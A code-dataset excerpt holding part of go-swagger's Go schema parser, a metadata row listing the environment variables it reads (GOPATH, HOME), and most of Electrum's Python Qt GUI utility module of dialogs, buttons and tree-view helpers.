newSingleLineTagParser("required", &setRequiredSchema{schema, nm}),
}
}
return sp
}
// hasFilePathPrefix reports whether the filesystem path s begins with the
// elements in prefix.
//
// taken from: https://github.com/golang/go/blob/c87520c5981ecdeaa99e7ba636a6088f900c0c75/src/cmd/go/internal/load/path.go#L60-L80
func hasFilePathPrefix(s, prefix string) bool {
sv := strings.ToUpper(filepath.VolumeName(s))
pv := strings.ToUpper(filepath.VolumeName(prefix))
s = s[len(sv):]
prefix = prefix[len(pv):]
switch {
default:
return false
case sv != pv:
return false
case len(s) == len(prefix):
return s == prefix
case len(s) > len(prefix):
if prefix != "" && prefix[len(prefix)-1] == filepath.Separator {
return strings.HasPrefix(s, prefix)
}
return s[len(prefix)] == filepath.Separator && s[:len(prefix)] == prefix
}
}
func (scp *schemaParser) packageForFile(gofile *ast.File, tpe *ast.Ident) (*loader.PackageInfo, error) {
fn := scp.program.Fset.File(gofile.Pos()).Name()
if Debug {
log.Println("trying for", fn)
}
fa, err := filepath.Abs(fn)
if err != nil {
return nil, err
}
if Debug {
log.Println("absolute path", fa)
}
var fgp string
gopath := os.Getenv("GOPATH")
if gopath == "" {
gopath = filepath.Join(os.Getenv("HOME"), "go")
}
for _, p := range append(filepath.SplitList(gopath), runtime.GOROOT()) {
pref := filepath.Join(p, "src")
if hasFilePathPrefix(fa, pref) {
fgp = filepath.Dir(strings.TrimPrefix(fa, pref))[1:]
break
}
}
if Debug {
log.Println("package in gopath", fgp)
}
for pkg, pkgInfo := range scp.program.AllPackages {
if Debug {
log.Println("inferring for", tpe.Name, "with", gofile.Name.Name, "at", pkg.Path(), "against", filepath.ToSlash(fgp))
}
if pkg.Name() == gofile.Name.Name && filepath.ToSlash(fgp) == pkg.Path() {
return pkgInfo, nil
}
}
return nil, fmt.Errorf("unable to determine package for %s", fn)
}
func (scp *schemaParser) packageForSelector(gofile *ast.File, expr ast.Expr) (*loader.PackageInfo, error) {
if pth, ok := expr.(*ast.Ident); ok {
// lookup import
var selPath string
for _, imp := range gofile.Imports {
pv, err := strconv.Unquote(imp.Path.Value)
if err != nil {
pv = imp.Path.Value
}
if imp.Name != nil {
if imp.Name.Name == pth.Name {
selPath = pv
break
}
} else {
pkg := scp.program.Package(pv)
if pkg != nil && pth.Name == pkg.Pkg.Name() {
selPath = pv
break
} else {
parts := strings.Split(pv, "/")
if len(parts) > 0 && parts[len(parts)-1] == pth.Name {
selPath = pv
break
}
}
}
}
// find actual struct
if selPath == "" {
return nil, fmt.Errorf("no import found for %s", pth.Name)
}
pkg := scp.program.Package(selPath)
if pkg != nil {
return pkg, nil
}
// TODO: I must admit this made me cry, it's not even a great solution.
pkg = scp.program.Package("github.com/go-swagger/go-swagger/vendor/" + selPath)
if pkg != nil {
return pkg, nil
}
for _, info := range scp.program.AllPackages {
n := info.String()
path := "/vendor/" + selPath
if strings.HasSuffix(n, path) {
pkg = scp.program.Package(n)
return pkg, nil
}
}
}
return nil, fmt.Errorf("can't determine selector path from %v", expr)
}
func (scp *schemaParser) makeRef(file *ast.File, pkg *loader.PackageInfo, gd *ast.GenDecl, ts *ast.TypeSpec, prop swaggerTypable) error {
sd := newSchemaDecl(file, gd, ts)
sd.inferNames()
// make an exception for time.Time because this is a well-known string format
if sd.Name == "Time" && pkg.String() == "time" {
return nil
}
ref, err := spec.NewRef("#/definitions/" + sd.Name)
if err != nil {
return err
}
prop.SetRef(ref)
scp.postDecls = append(scp.postDecls, *sd)
return nil
}
func (scp *schemaParser) parseIdentProperty(pkg *loader.PackageInfo, expr *ast.Ident, prop swaggerTypable) error {
// find the file this selector points to
file, gd, ts, err := findSourceFile(pkg, expr.Name)
if err != nil {
err := swaggerSchemaForType(expr.Name, prop)
if err != nil {
return fmt.Errorf("package %s, error is: %v", pkg.String(), err)
}
return nil
}
if at, ok := ts.Type.(*ast.ArrayType); ok {
// the swagger spec defines strfmt base64 as []byte.
// in that case we don't actually want to turn it into an array
// but we want to turn it into a string
if _, ok := at.Elt.(*ast.Ident); ok {
if strfmtName, ok := strfmtName(gd.Doc); ok {
prop.Typed("string", strfmtName)
return nil
}
}
// this is a selector, so most likely not base64
if strfmtName, ok := strfmtName(gd.Doc); ok {
prop.Items().Typed("string", strfmtName)
return nil
}
}
// look at doc comments for swagger:strfmt [name]
// when found this is the format name, create a schema with that name
if strfmtName, ok := strfmtName(gd.Doc); ok {
prop.Typed("string", strfmtName)
return nil
}
if enumName, ok := enumName(gd.Doc); ok {
log.Println(enumName)
return nil
}
if defaultName, ok := defaultName(gd.Doc); ok {
log.Println(defaultName)
return nil
}
if isAliasParam(prop) || aliasParam(gd.Doc) {
itype, ok := ts.Type.(*ast.Ident)
if ok {
err := swaggerSchemaForType(itype.Name, prop)
if err == nil {
return nil
}
}
}
switch tpe := ts.Type.(type) {
case *ast.ArrayType:
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.StructType:
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.Ident:
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.StarExpr:
return parseProperty(scp, file, tpe.X, prop)
case *ast.SelectorExpr:
// return scp.refForSelector(file, gd, tpe, ts, prop)
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.InterfaceType:
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.MapType:
return scp.makeRef(file, pkg, gd, ts, prop)
default:
err := swaggerSchemaForType(expr.Name, prop)
if err != nil {
return fmt.Errorf("package %s, error is: %v", pkg.String(), err)
}
return nil
}
}
func (scp *schemaParser) typeForSelector(gofile *ast.File, expr *ast.SelectorExpr, prop swaggerTypable) error {
pkg, err := scp.packageForSelector(gofile, expr.X)
if err != nil {
return err
}
return scp.parseIdentProperty(pkg, expr.Sel, prop)
}
func findSourceFile(pkg *loader.PackageInfo, typeName string) (*ast.File, *ast.GenDecl, *ast.TypeSpec, error) {
for _, file := range pkg.Files {
for _, decl := range file.Decls {
if gd, ok := decl.(*ast.GenDecl); ok {
for _, gs := range gd.Specs {
if ts, ok := gs.(*ast.TypeSpec); ok {
strfmtNme, isStrfmt := strfmtName(gd.Doc)
if (isStrfmt && strfmtNme == typeName) || ts.Name != nil && ts.Name.Name == typeName {
return file, gd, ts, nil
}
}
}
}
}
}
return nil, nil, nil, fmt.Errorf("unable to find %s in %s", typeName, pkg.String())
}
func allOfMember(comments *ast.CommentGroup) bool {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
if rxAllOf.MatchString(ln) {
return true
}
}
}
}
return false
}
func fileParam(comments *ast.CommentGroup) bool {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
if rxFileUpload.MatchString(ln) {
return true
}
}
}
}
return false
}
func strfmtName(comments *ast.CommentGroup) (string, bool) {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxStrFmt.FindStringSubmatch(ln)
if len(matches) > 1 && len(strings.TrimSpace(matches[1])) > 0 {
return strings.TrimSpace(matches[1]), true
}
}
}
}
return "", false
}
func enumName(comments *ast.CommentGroup) (string, bool) {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxEnum.FindStringSubmatch(ln)
if len(matches) > 1 && len(strings.TrimSpace(matches[1])) > 0 {
return strings.TrimSpace(matches[1]), true
}
}
}
}
return "", false
}
func aliasParam(comments *ast.CommentGroup) bool {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
if rxAlias.MatchString(ln) {
return true
}
}
}
}
return false
}
func defaultName(comments *ast.CommentGroup) (string, bool) {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxDefault.FindStringSubmatch(ln)
if len(matches) > 1 && len(strings.TrimSpace(matches[1])) > 0 {
return strings.TrimSpace(matches[1]), true
}
}
}
}
return "", false
}
func parseProperty(scp *schemaParser, gofile *ast.File, fld ast.Expr, prop swaggerTypable) error {
switch ftpe := fld.(type) {
case *ast.Ident: // simple value
pkg, err := scp.packageForFile(gofile, ftpe)
if err != nil {
return err
}
return scp.parseIdentProperty(pkg, ftpe, prop)
case *ast.StarExpr: // pointer to something, optional by default
if err := parseProperty(scp, gofile, ftpe.X, prop); err != nil {
return err
}
case *ast.ArrayType: // slice type
if err := parseProperty(scp, gofile, ftpe.Elt, prop.Items()); err != nil {
return err
}
case *ast.StructType:
schema := prop.Schema()
if schema == nil {
return fmt.Errorf("items doesn't support embedded structs")
}
return scp.parseStructType(gofile, prop.Schema(), ftpe, make(map[string]string))
case *ast.SelectorExpr:
err := scp.typeForSelector(gofile, ftpe, prop)
return err
case *ast.MapType:
// check if key is a string type, if not print a message
// and skip the map property. Only maps with string keys can go into additional properties
sch := prop.Schema()
if sch == nil {
return fmt.Errorf("items doesn't support maps")
}
if keyIdent, ok := ftpe.Key.(*ast.Ident); sch != nil && ok {
if keyIdent.Name == "string" {
if sch.AdditionalProperties == nil {
sch.AdditionalProperties = new(spec.SchemaOrBool)
}
sch.AdditionalProperties.Allows = false
if sch.AdditionalProperties.Schema == nil {
sch.AdditionalProperties.Schema = new(spec.Schema)
}
if err := parseProperty(scp, gofile, ftpe.Value, schemaTypable{sch.AdditionalProperties.Schema, 0}); err != nil {
return err
}
sch.Typed("object", "")
}
}
case *ast.InterfaceType:
prop.Schema().Typed("object", "")
default:
pos := "unknown file:unknown position"
if scp != nil {
if scp.program != nil {
if scp.program.Fset != nil {
pos = scp.program.Fset.Position(fld.Pos()).String()
}
}
}
return fmt.Errorf("Expr (%s) is unsupported for a schema", pos)
}
return nil
}
func parseJSONTag(field *ast.Field) (name string, ignore bool, err error) {
if len(field.Names) > 0 {
name = field.Names[0].Name
}
if field.Tag != nil && len(strings.TrimSpace(field.Tag.Value)) > 0 {
tv, err := strconv.Unquote(field.Tag.Value)
if err != nil {
return name, false, err
}
if strings.TrimSpace(tv) != "" {
st := reflect.StructTag(tv)
jsonName := strings.Split(st.Get("json"), ",")[0]
if jsonName == "-" {
return name, true, nil
} else if jsonName != "" {
return jsonName, false, nil
}
}
}
return name, false, nil
}
|
[
"\"GOPATH\"",
"\"HOME\""
] |
[] |
[
"GOPATH",
"HOME"
] |
[]
|
["GOPATH", "HOME"]
|
go
| 2 | 0 | |
electrum/gui/qt/util.py
|
import asyncio
import os.path
import time
import sys
import platform
import queue
import traceback
import os
import webbrowser
from decimal import Decimal
from functools import partial, lru_cache
from typing import (NamedTuple, Callable, Optional, TYPE_CHECKING, Union, List, Dict, Any,
Sequence, Iterable)
from PyQt5.QtGui import (QFont, QColor, QCursor, QPixmap, QStandardItem, QImage,
QPalette, QIcon, QFontMetrics, QShowEvent, QPainter, QHelpEvent)
from PyQt5.QtCore import (Qt, QPersistentModelIndex, QModelIndex, pyqtSignal,
QCoreApplication, QItemSelectionModel, QThread,
QSortFilterProxyModel, QSize, QLocale, QAbstractItemModel,
QEvent, QRect, QPoint, QObject)
from PyQt5.QtWidgets import (QPushButton, QLabel, QMessageBox, QHBoxLayout,
QAbstractItemView, QVBoxLayout, QLineEdit,
QStyle, QDialog, QGroupBox, QButtonGroup, QRadioButton,
QFileDialog, QWidget, QToolButton, QTreeView, QPlainTextEdit,
QHeaderView, QApplication, QToolTip, QTreeWidget, QStyledItemDelegate,
QMenu, QStyleOptionViewItem, QLayout, QLayoutItem,
QGraphicsEffect, QGraphicsScene, QGraphicsPixmapItem)
from electrum.i18n import _, languages
from electrum.util import FileImportFailed, FileExportFailed, make_aiohttp_session, resource_path
from electrum.invoices import PR_UNPAID, PR_PAID, PR_EXPIRED, PR_INFLIGHT, PR_UNKNOWN, PR_FAILED, PR_ROUTING, PR_UNCONFIRMED
if TYPE_CHECKING:
from .main_window import ElectrumWindow
from .installwizard import InstallWizard
from electrum.simple_config import SimpleConfig
if platform.system() == 'Windows':
MONOSPACE_FONT = 'Lucida Console'
elif platform.system() == 'Darwin':
MONOSPACE_FONT = 'Monaco'
else:
MONOSPACE_FONT = 'monospace'
dialogs = []
pr_icons = {
PR_UNKNOWN:"warning.png",
PR_UNPAID:"unpaid.png",
PR_PAID:"confirmed.png",
PR_EXPIRED:"expired.png",
PR_INFLIGHT:"unconfirmed.png",
PR_FAILED:"warning.png",
PR_ROUTING:"unconfirmed.png",
PR_UNCONFIRMED:"unconfirmed.png",
}
# filter tx files in QFileDialog:
TRANSACTION_FILE_EXTENSION_FILTER_ANY = "Transaction (*.txn *.psbt);;All files (*)"
TRANSACTION_FILE_EXTENSION_FILTER_ONLY_PARTIAL_TX = "Partial Transaction (*.psbt)"
TRANSACTION_FILE_EXTENSION_FILTER_ONLY_COMPLETE_TX = "Complete Transaction (*.txn)"
TRANSACTION_FILE_EXTENSION_FILTER_SEPARATE = (f"{TRANSACTION_FILE_EXTENSION_FILTER_ONLY_PARTIAL_TX};;"
f"{TRANSACTION_FILE_EXTENSION_FILTER_ONLY_COMPLETE_TX};;"
f"All files (*)")
class EnterButton(QPushButton):
def __init__(self, text, func):
QPushButton.__init__(self, text)
self.func = func
self.clicked.connect(func)
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
class ThreadedButton(QPushButton):
def __init__(self, text, task, on_success=None, on_error=None):
QPushButton.__init__(self, text)
self.task = task
self.on_success = on_success
self.on_error = on_error
self.clicked.connect(self.run_task)
def run_task(self):
self.setEnabled(False)
self.thread = TaskThread(self)
self.thread.add(self.task, self.on_success, self.done, self.on_error)
def done(self):
self.setEnabled(True)
self.thread.stop()
class WWLabel(QLabel):
def __init__ (self, text="", parent=None):
QLabel.__init__(self, text, parent)
self.setWordWrap(True)
self.setTextInteractionFlags(Qt.TextSelectableByMouse)
class HelpLabel(QLabel):
def __init__(self, text, help_text):
QLabel.__init__(self, text)
self.help_text = help_text
self.app = QCoreApplication.instance()
self.font = QFont()
def mouseReleaseEvent(self, x):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Help'),
text=self.help_text)
def enterEvent(self, event):
self.font.setUnderline(True)
self.setFont(self.font)
self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
return QLabel.enterEvent(self, event)
def leaveEvent(self, event):
self.font.setUnderline(False)
self.setFont(self.font)
self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
return QLabel.leaveEvent(self, event)
class HelpButton(QToolButton):
def __init__(self, text):
QToolButton.__init__(self)
self.setText('?')
self.help_text = text
self.setFocusPolicy(Qt.NoFocus)
self.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.clicked.connect(self.onclick)
def onclick(self):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Help'),
text=self.help_text,
rich_text=True)
class InfoButton(QPushButton):
def __init__(self, text):
QPushButton.__init__(self, 'Info')
self.help_text = text
self.setFocusPolicy(Qt.NoFocus)
self.setFixedWidth(6 * char_width_in_lineedit())
self.clicked.connect(self.onclick)
def onclick(self):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Info'),
text=self.help_text,
rich_text=True)
class Buttons(QHBoxLayout):
def __init__(self, *buttons):
QHBoxLayout.__init__(self)
self.addStretch(1)
for b in buttons:
if b is None:
continue
self.addWidget(b)
class CloseButton(QPushButton):
def __init__(self, dialog):
QPushButton.__init__(self, _("Close"))
self.clicked.connect(dialog.close)
self.setDefault(True)
class CopyButton(QPushButton):
def __init__(self, text_getter, app):
QPushButton.__init__(self, _("Copy"))
self.clicked.connect(lambda: app.clipboard().setText(text_getter()))
class CopyCloseButton(QPushButton):
def __init__(self, text_getter, app, dialog):
QPushButton.__init__(self, _("Copy and Close"))
self.clicked.connect(lambda: app.clipboard().setText(text_getter()))
self.clicked.connect(dialog.close)
self.setDefault(True)
class OkButton(QPushButton):
def __init__(self, dialog, label=None):
QPushButton.__init__(self, label or _("OK"))
self.clicked.connect(dialog.accept)
self.setDefault(True)
class CancelButton(QPushButton):
def __init__(self, dialog, label=None):
QPushButton.__init__(self, label or _("Cancel"))
self.clicked.connect(dialog.reject)
class MessageBoxMixin(object):
def top_level_window_recurse(self, window=None, test_func=None):
window = window or self
classes = (WindowModalDialog, QMessageBox)
if test_func is None:
test_func = lambda x: True
for n, child in enumerate(window.children()):
# Test for visibility as old closed dialogs may not be GC-ed.
# Only accept children that confirm to test_func.
if isinstance(child, classes) and child.isVisible() \
and test_func(child):
return self.top_level_window_recurse(child, test_func=test_func)
return window
def top_level_window(self, test_func=None):
return self.top_level_window_recurse(test_func)
def question(self, msg, parent=None, title=None, icon=None, **kwargs) -> bool:
Yes, No = QMessageBox.Yes, QMessageBox.No
return Yes == self.msg_box(icon=icon or QMessageBox.Question,
parent=parent,
title=title or '',
text=msg,
buttons=Yes|No,
defaultButton=No,
**kwargs)
def show_warning(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Warning, parent,
title or _('Warning'), msg, **kwargs)
def show_error(self, msg, parent=None, **kwargs):
return self.msg_box(QMessageBox.Warning, parent,
_('Error'), msg, **kwargs)
def show_critical(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Critical, parent,
title or _('Critical Error'), msg, **kwargs)
def show_message(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Information, parent,
title or _('Information'), msg, **kwargs)
def msg_box(self, icon, parent, title, text, *, buttons=QMessageBox.Ok,
defaultButton=QMessageBox.NoButton, rich_text=False,
checkbox=None):
parent = parent or self.top_level_window()
return custom_message_box(icon=icon,
parent=parent,
title=title,
text=text,
buttons=buttons,
defaultButton=defaultButton,
rich_text=rich_text,
checkbox=checkbox)
def custom_message_box(*, icon, parent, title, text, buttons=QMessageBox.Ok,
defaultButton=QMessageBox.NoButton, rich_text=False,
checkbox=None):
if type(icon) is QPixmap:
d = QMessageBox(QMessageBox.Information, title, str(text), buttons, parent)
d.setIconPixmap(icon)
else:
d = QMessageBox(icon, title, str(text), buttons, parent)
d.setWindowModality(Qt.WindowModal)
d.setDefaultButton(defaultButton)
if rich_text:
d.setTextInteractionFlags(Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse)
# set AutoText instead of RichText
# AutoText lets Qt figure out whether to render as rich text.
# e.g. if text is actually plain text and uses "\n" newlines;
# and we set RichText here, newlines would be swallowed
d.setTextFormat(Qt.AutoText)
else:
d.setTextInteractionFlags(Qt.TextSelectableByMouse)
d.setTextFormat(Qt.PlainText)
if checkbox is not None:
d.setCheckBox(checkbox)
return d.exec_()
class WindowModalDialog(QDialog, MessageBoxMixin):
'''Handy wrapper; window modal dialogs are better for our multi-window
daemon model as other wallet windows can still be accessed.'''
def __init__(self, parent, title=None):
QDialog.__init__(self, parent)
self.setWindowModality(Qt.WindowModal)
if title:
self.setWindowTitle(title)
class WaitingDialog(WindowModalDialog):
'''Shows a please wait dialog whilst running a task. It is not
necessary to maintain a reference to this dialog.'''
def __init__(self, parent: QWidget, message: str, task, on_success=None, on_error=None):
assert parent
if isinstance(parent, MessageBoxMixin):
parent = parent.top_level_window()
WindowModalDialog.__init__(self, parent, _("Please wait"))
self.message_label = QLabel(message)
vbox = QVBoxLayout(self)
vbox.addWidget(self.message_label)
self.accepted.connect(self.on_accepted)
self.show()
self.thread = TaskThread(self)
self.thread.finished.connect(self.deleteLater) # see #3956
self.thread.add(task, on_success, self.accept, on_error)
def wait(self):
self.thread.wait()
def on_accepted(self):
self.thread.stop()
def update(self, msg):
print(msg)
self.message_label.setText(msg)
class BlockingWaitingDialog(WindowModalDialog):
"""Shows a waiting dialog whilst running a task.
Should be called from the GUI thread. The GUI thread will be blocked while
the task is running; the point of the dialog is to provide feedback
to the user regarding what is going on.
"""
def __init__(self, parent: QWidget, message: str, task: Callable[[], Any]):
assert parent
if isinstance(parent, MessageBoxMixin):
parent = parent.top_level_window()
WindowModalDialog.__init__(self, parent, _("Please wait"))
self.message_label = QLabel(message)
vbox = QVBoxLayout(self)
vbox.addWidget(self.message_label)
# show popup
self.show()
# refresh GUI; needed for popup to appear and for message_label to get drawn
QCoreApplication.processEvents()
QCoreApplication.processEvents()
# block and run given task
task()
# close popup
self.accept()
def line_dialog(parent, title, label, ok_label, default=None):
dialog = WindowModalDialog(parent, title)
dialog.setMinimumWidth(500)
l = QVBoxLayout()
dialog.setLayout(l)
l.addWidget(QLabel(label))
txt = QLineEdit()
if default:
txt.setText(default)
l.addWidget(txt)
l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label)))
if dialog.exec_():
return txt.text()
def text_dialog(
*,
parent,
title,
header_layout,
ok_label,
default=None,
allow_multi=False,
config: 'SimpleConfig',
):
from .qrtextedit import ScanQRTextEdit
dialog = WindowModalDialog(parent, title)
dialog.setMinimumWidth(600)
l = QVBoxLayout()
dialog.setLayout(l)
if isinstance(header_layout, str):
l.addWidget(QLabel(header_layout))
else:
l.addLayout(header_layout)
txt = ScanQRTextEdit(allow_multi=allow_multi, config=config)
if default:
txt.setText(default)
l.addWidget(txt)
l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label)))
if dialog.exec_():
return txt.toPlainText()
class ChoicesLayout(object):
def __init__(self, msg, choices, on_clicked=None, checked_index=0):
vbox = QVBoxLayout()
if len(msg) > 50:
vbox.addWidget(WWLabel(msg))
msg = ""
gb2 = QGroupBox(msg)
vbox.addWidget(gb2)
vbox2 = QVBoxLayout()
gb2.setLayout(vbox2)
self.group = group = QButtonGroup()
for i,c in enumerate(choices):
button = QRadioButton(gb2)
button.setText(c)
vbox2.addWidget(button)
group.addButton(button)
group.setId(button, i)
if i==checked_index:
button.setChecked(True)
if on_clicked:
group.buttonClicked.connect(partial(on_clicked, self))
self.vbox = vbox
def layout(self):
return self.vbox
def selected_index(self):
return self.group.checkedId()
def address_field(addresses):
hbox = QHBoxLayout()
address_e = QLineEdit()
if addresses and len(addresses) > 0:
address_e.setText(addresses[0])
else:
addresses = []
def func():
try:
i = addresses.index(str(address_e.text())) + 1
i = i % len(addresses)
address_e.setText(addresses[i])
except ValueError:
# the user might have changed address_e to an
# address not in the wallet (or to something that isn't an address)
if addresses and len(addresses) > 0:
address_e.setText(addresses[0])
button = QPushButton(_('Address'))
button.clicked.connect(func)
hbox.addWidget(button)
hbox.addWidget(address_e)
return hbox, address_e
def filename_field(parent, config, defaultname, select_msg):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Format")))
gb = QGroupBox("format", parent)
b1 = QRadioButton(gb)
b1.setText(_("CSV"))
b1.setChecked(True)
b2 = QRadioButton(gb)
b2.setText(_("json"))
vbox.addWidget(b1)
vbox.addWidget(b2)
hbox = QHBoxLayout()
directory = config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, defaultname)
filename_e = QLineEdit()
filename_e.setText(path)
def func():
text = filename_e.text()
_filter = "*.csv" if defaultname.endswith(".csv") else "*.json" if defaultname.endswith(".json") else None
p = getSaveFileName(
parent=None,
title=select_msg,
filename=text,
filter=_filter,
config=config,
)
if p:
filename_e.setText(p)
button = QPushButton(_('File'))
button.clicked.connect(func)
hbox.addWidget(button)
hbox.addWidget(filename_e)
vbox.addLayout(hbox)
def set_csv(v):
text = filename_e.text()
text = text.replace(".json",".csv") if v else text.replace(".csv",".json")
filename_e.setText(text)
b1.clicked.connect(lambda: set_csv(True))
b2.clicked.connect(lambda: set_csv(False))
return vbox, filename_e, b1
class ElectrumItemDelegate(QStyledItemDelegate):
def __init__(self, tv: 'MyTreeView'):
super().__init__(tv)
self.tv = tv
self.opened = None
def on_closeEditor(editor: QLineEdit, hint):
self.opened = None
self.tv.is_editor_open = False
if self.tv._pending_update:
self.tv.update()
def on_commitData(editor: QLineEdit):
new_text = editor.text()
idx = QModelIndex(self.opened)
row, col = idx.row(), idx.column()
edit_key = self.tv.get_edit_key_from_coordinate(row, col)
assert edit_key is not None, (idx.row(), idx.column())
self.tv.on_edited(idx, edit_key=edit_key, text=new_text)
self.closeEditor.connect(on_closeEditor)
self.commitData.connect(on_commitData)
def createEditor(self, parent, option, idx):
self.opened = QPersistentModelIndex(idx)
self.tv.is_editor_open = True
return super().createEditor(parent, option, idx)
def paint(self, painter: QPainter, option: QStyleOptionViewItem, idx: QModelIndex) -> None:
custom_data = idx.data(MyTreeView.ROLE_CUSTOM_PAINT)
if custom_data is None:
return super().paint(painter, option, idx)
else:
# let's call the default paint method first; to paint the background (e.g. selection)
super().paint(painter, option, idx)
# and now paint on top of that
custom_data.paint(painter, option.rect)
def helpEvent(self, evt: QHelpEvent, view: QAbstractItemView, option: QStyleOptionViewItem, idx: QModelIndex) -> bool:
custom_data = idx.data(MyTreeView.ROLE_CUSTOM_PAINT)
if custom_data is None:
return super().helpEvent(evt, view, option, idx)
else:
if evt.type() == QEvent.ToolTip:
if custom_data.show_tooltip(evt):
return True
return super().helpEvent(evt, view, option, idx)
def sizeHint(self, option: QStyleOptionViewItem, idx: QModelIndex) -> QSize:
custom_data = idx.data(MyTreeView.ROLE_CUSTOM_PAINT)
if custom_data is None:
return super().sizeHint(option, idx)
else:
default_size = super().sizeHint(option, idx)
return custom_data.sizeHint(default_size)
class MyTreeView(QTreeView):
ROLE_CLIPBOARD_DATA = Qt.UserRole + 100
ROLE_CUSTOM_PAINT = Qt.UserRole + 101
ROLE_EDIT_KEY = Qt.UserRole + 102
ROLE_FILTER_DATA = Qt.UserRole + 103
filter_columns: Iterable[int]
def __init__(self, parent: 'ElectrumWindow', create_menu, *,
stretch_column=None, editable_columns=None):
super().__init__(parent)
self.parent = parent
self.config = self.parent.config
self.stretch_column = stretch_column
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(create_menu)
self.setUniformRowHeights(True)
# Control which columns are editable
if editable_columns is None:
editable_columns = []
self.editable_columns = set(editable_columns)
self.setItemDelegate(ElectrumItemDelegate(self))
self.current_filter = ""
self.is_editor_open = False
self.setRootIsDecorated(False) # remove left margin
self.toolbar_shown = False
# When figuring out the size of columns, Qt by default looks at
# the first 1000 rows (at least if resize mode is QHeaderView.ResizeToContents).
# This would be REALLY SLOW, and it's not perfect anyway.
# So to speed the UI up considerably, set it to
# only look at as many rows as currently visible.
self.header().setResizeContentsPrecision(0)
self._pending_update = False
self._forced_update = False
def set_editability(self, items):
for idx, i in enumerate(items):
i.setEditable(idx in self.editable_columns)
def selected_in_column(self, column: int):
items = self.selectionModel().selectedIndexes()
return list(x for x in items if x.column() == column)
def get_role_data_for_current_item(self, *, col, role) -> Any:
idx = self.selectionModel().currentIndex()
idx = idx.sibling(idx.row(), col)
item = self.item_from_index(idx)
if item:
return item.data(role)
def item_from_index(self, idx: QModelIndex) -> Optional[QStandardItem]:
model = self.model()
if isinstance(model, QSortFilterProxyModel):
idx = model.mapToSource(idx)
return model.sourceModel().itemFromIndex(idx)
else:
return model.itemFromIndex(idx)
def original_model(self) -> QAbstractItemModel:
model = self.model()
if isinstance(model, QSortFilterProxyModel):
return model.sourceModel()
else:
return model
def set_current_idx(self, set_current: QPersistentModelIndex):
if set_current:
assert isinstance(set_current, QPersistentModelIndex)
assert set_current.isValid()
self.selectionModel().select(QModelIndex(set_current), QItemSelectionModel.SelectCurrent)
def update_headers(self, headers: Union[List[str], Dict[int, str]]):
# headers is either a list of column names, or a dict: (col_idx->col_name)
if not isinstance(headers, dict): # convert to dict
headers = dict(enumerate(headers))
col_names = [headers[col_idx] for col_idx in sorted(headers.keys())]
self.original_model().setHorizontalHeaderLabels(col_names)
self.header().setStretchLastSection(False)
for col_idx in headers:
sm = QHeaderView.Stretch if col_idx == self.stretch_column else QHeaderView.ResizeToContents
self.header().setSectionResizeMode(col_idx, sm)
def keyPressEvent(self, event):
if self.itemDelegate().opened:
return
if event.key() in [Qt.Key_F2, Qt.Key_Return, Qt.Key_Enter]:
self.on_activated(self.selectionModel().currentIndex())
return
super().keyPressEvent(event)
def on_activated(self, idx):
# on 'enter' we show the menu
pt = self.visualRect(idx).bottomLeft()
pt.setX(50)
self.customContextMenuRequested.emit(pt)
def edit(self, idx, trigger=QAbstractItemView.AllEditTriggers, event=None):
"""
this is to prevent:
edit: editing failed
from inside qt
"""
return super().edit(idx, trigger, event)
def on_edited(self, idx: QModelIndex, edit_key, *, text: str) -> None:
raise NotImplementedError()
def should_hide(self, row):
"""
row_num is for self.model(). So if there is a proxy, it is the row number
in that!
"""
return False
def get_text_from_coordinate(self, row, col) -> str:
idx = self.model().index(row, col)
item = self.item_from_index(idx)
return item.text()
def get_role_data_from_coordinate(self, row, col, *, role) -> Any:
idx = self.model().index(row, col)
item = self.item_from_index(idx)
role_data = item.data(role)
return role_data
def get_edit_key_from_coordinate(self, row, col) -> Any:
# overriding this might allow avoiding storing duplicate data
return self.get_role_data_from_coordinate(row, col, role=self.ROLE_EDIT_KEY)
def get_filter_data_from_coordinate(self, row, col) -> str:
filter_data = self.get_role_data_from_coordinate(row, col, role=self.ROLE_FILTER_DATA)
if filter_data:
return filter_data
txt = self.get_text_from_coordinate(row, col)
txt = txt.lower()
return txt
def hide_row(self, row_num):
"""
row_num is for self.model(). So if there is a proxy, it is the row number
in that!
"""
should_hide = self.should_hide(row_num)
if not self.current_filter and should_hide is None:
# no filters at all, neither date nor search
self.setRowHidden(row_num, QModelIndex(), False)
return
for column in self.filter_columns:
filter_data = self.get_filter_data_from_coordinate(row_num, column)
if self.current_filter in filter_data:
# the filter matched, but the date filter might apply
self.setRowHidden(row_num, QModelIndex(), bool(should_hide))
break
else:
# we did not find the filter in any columns, hide the item
self.setRowHidden(row_num, QModelIndex(), True)
def filter(self, p=None):
if p is not None:
p = p.lower()
self.current_filter = p
self.hide_rows()
def hide_rows(self):
for row in range(self.model().rowCount()):
self.hide_row(row)
def create_toolbar(self, config=None):
